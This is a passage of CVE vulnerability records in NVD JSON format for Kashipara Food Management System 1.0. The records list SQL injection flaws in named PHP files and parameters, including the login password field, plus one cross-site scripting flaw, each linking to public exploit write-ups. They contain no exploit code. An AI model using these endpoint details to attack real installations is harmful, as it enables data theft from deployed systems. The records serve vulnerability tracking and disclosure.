"configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-07T11:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0273", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%203.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%203.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%203.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%203.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249828", "name" : "https://vuldb.com/?ctiid.249828", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249828", "name" : "https://vuldb.com/?ctiid.249828", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249828", "name" : "https://vuldb.com/?id.249828", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249828", "name" : "https://vuldb.com/?id.249828", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Kashipara Food Management System up to 1.0. It has been classified as critical. Affected is an unknown function of the file addwaste_entry.php. The manipulation of the argument item_name leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249828." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-07T11:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0274", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%202.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%202.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%202.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%202.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249829", "name" : "https://vuldb.com/?ctiid.249829", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249829", "name" : "https://vuldb.com/?ctiid.249829", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249829", "name" : "https://vuldb.com/?id.249829", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249829", "name" : "https://vuldb.com/?id.249829", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Kashipara Food Management System up to 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file billAjax.php. The manipulation of the argument item_name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249829 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-07T12:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0275", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%204.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%204.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%204.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%204.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249830", "name" : "https://vuldb.com/?ctiid.249830", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249830", "name" : "https://vuldb.com/?ctiid.249830", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249830", "name" : "https://vuldb.com/?id.249830", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249830", "name" : "https://vuldb.com/?id.249830", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Kashipara Food Management System up to 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file item_edit_submit.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249830 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-07T12:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0276", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%205.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%205.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%205.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%205.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249831", "name" : "https://vuldb.com/?ctiid.249831", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249831", "name" : "https://vuldb.com/?ctiid.249831", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249831", "name" : "https://vuldb.com/?id.249831", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249831", "name" : "https://vuldb.com/?id.249831", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in Kashipara Food Management System up to 1.0. This affects an unknown part of the file rawstock_used_damaged_smt.php. The manipulation of the argument product_name leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249831." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-07T13:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0277", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%209.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%209.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%209.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%209.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249832", "name" : "https://vuldb.com/?ctiid.249832", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249832", "name" : "https://vuldb.com/?ctiid.249832", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249832", "name" : "https://vuldb.com/?id.249832", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249832", "name" : "https://vuldb.com/?id.249832", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Kashipara Food Management System up to 1.0. This vulnerability affects unknown code of the file party_submit.php. The manipulation of the argument party_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249832." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-07T13:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0278", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2010.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2010.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2010.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2010.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249833", "name" : "https://vuldb.com/?ctiid.249833", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249833", "name" : "https://vuldb.com/?ctiid.249833", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249833", "name" : "https://vuldb.com/?id.249833", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249833", "name" : "https://vuldb.com/?id.249833", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in Kashipara Food Management System up to 1.0. This issue affects some unknown processing of the file partylist_edit_submit.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249833 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-07T14:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0279", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2011.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2011.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2011.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2011.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249834", "name" : "https://vuldb.com/?ctiid.249834", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249834", "name" : "https://vuldb.com/?ctiid.249834", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249834", "name" : "https://vuldb.com/?id.249834", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249834", "name" : "https://vuldb.com/?id.249834", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in Kashipara Food Management System up to 1.0. Affected is an unknown function of the file item_list_edit.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249834 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-07T14:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0280", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2012.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2012.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2012.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2012.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249835", "name" : "https://vuldb.com/?ctiid.249835", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249835", "name" : "https://vuldb.com/?ctiid.249835", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249835", "name" : "https://vuldb.com/?id.249835", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249835", "name" : "https://vuldb.com/?id.249835", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Kashipara Food Management System up to 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file item_type_submit.php. The manipulation of the argument type_name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249835." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-07T15:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0281", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2013.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2013.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2013.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2013.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249836", "name" : "https://vuldb.com/?ctiid.249836", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249836", "name" : "https://vuldb.com/?ctiid.249836", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249836", "name" : "https://vuldb.com/?id.249836", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249836", "name" : "https://vuldb.com/?id.249836", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Kashipara Food Management System up to 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file loginCheck.php. The manipulation of the argument password leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249836." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-07T15:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0282", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2014.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2014.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2014.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2014.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249837", "name" : "https://vuldb.com/?ctiid.249837", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.249837", "name" : "https://vuldb.com/?ctiid.249837", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249837", "name" : "https://vuldb.com/?id.249837", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.249837", "name" : "https://vuldb.com/?id.249837", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Kashipara Food Management System up to 1.0. It has been classified as problematic. This affects an unknown part of the file addmaterialsubmit.php. The manipulation of the argument tin leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249837 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:kashipara:food_management_system:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-07T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0283", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2015.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2015.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2015.pdf", "name" : "https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%2015.pdf", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : 